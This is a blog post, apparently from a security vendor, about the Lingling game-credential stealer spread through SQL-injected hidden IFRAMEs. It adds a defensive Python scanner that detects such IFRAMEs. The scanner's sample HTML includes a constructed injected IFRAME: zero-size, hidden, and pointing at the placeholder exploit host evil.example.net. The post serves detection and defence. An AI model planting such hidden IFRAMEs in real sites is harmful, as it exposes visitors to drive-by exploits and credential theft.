One of the principles behind malware is that it follows technology and mainstream culture. If ninety percent of the world were using the EricOS, the vast majority of threats would be written for the EricOS, because otherwise they would have nothing to infect.
In China, online computer usage patterns shape the types of malware Symantec sees there. Walk into an Internet cafe in China and you rarely see people using search engines like Google or Web sites like MySpace. Instead, the vast majority of people have headphones on and are playing online games such as Lineage or World of Warcraft.
Thus, Symantec sees a lot of Infostealers that attempt to steal credentials for these types of online games. Once credentials are stolen, the hacker logs into the account, steals the virtual items, and then attempts to sell them for real money through various boards outside the virtual gaming world.
An example of this threat is Lingling (the name means "zero-zero" in English). Lingling was spread by hackers who used SQL injection to place a small HTML IFRAME into the content of hacked Web sites. When a visitor viewed such a page, the IFRAME caused the browser to load JavaScript containing a variety of Internet Explorer exploits that eventually downloaded and executed Lingling. The hackers behind Lingling appear to be the same group that placed an IFRAME in the Dolphins Stadium Web site in the Superbowl infection to download a similar executable. Once Lingling is installed, it waits for you to play World of Warcraft, scans the game client's memory for your credentials, and sends them to the hacker.
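The injected IFRAME is the part of this chain a Web site owner can actually check for. The following scanner is an added example written for this post, not Symantec's tool or anything recovered from Lingling itself: it parses a page and flags IFRAMEs that are hidden, sized to zero, or point at a host other than the site's own. The sample HTML and the hostname evil.example.net are constructed for illustration.

```python
"""Flag hidden or off-site IFRAMEs of the kind injected into hacked Web sites.

Added example; the HTML below is constructed, and evil.example.net is a
placeholder for an attacker-controlled exploit host.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate IFRAME, one injected zero-size
# IFRAME pointing at an off-site host (the pattern described in the post).
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="/help/faq.html" width="600" height="400"></iframe>
<p>Latest news</p>
<iframe src="http://evil.example.net/a.htm" width="0" height="0" style="display:none"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attribute dictionaries of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def _dimension_is_tiny(value):
    """True when a width/height attribute is 1px or less (e.g. "0", "1px")."""
    if value is None:
        return False
    text = value.strip().lower().rstrip("px")
    try:
        return float(text) <= 1
    except ValueError:
        return False


def suspicious_iframes(html, site_host):
    """Return [(src, [reasons])] for IFRAMEs that look injected.

    site_host is the hostname the page is served from; any IFRAME whose src
    names a different host is reported as off-site.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        reasons = []
        host = urlparse(src).hostname
        if host and host.lower() != site_host.lower():
            reasons.append("off-site src")
        if _dimension_is_tiny(attrs.get("width")) or _dimension_is_tiny(attrs.get("height")):
            reasons.append("zero-size")
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_HTML, "www.example.com"):
        print(src, "->", ", ".join(reasons))
```

Running the check against rendered pages catches only IFRAMEs that are present as HTML; if the injected string is a script that writes the IFRAME at run time, the same rules have to be applied to the database rows or templates the site renders, which is also where SQL-injected content should be removed rather than merely hidden from the scanner.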
We've been tracking how these hackers operate, including sending shutdown notices to their executable distribution sites and attempting to notify the owners of the hacked Web sites. In addition, we've put together a video describing how the threat works for our Chinese readers. Watch the video of Robert Wang describing Lingling below.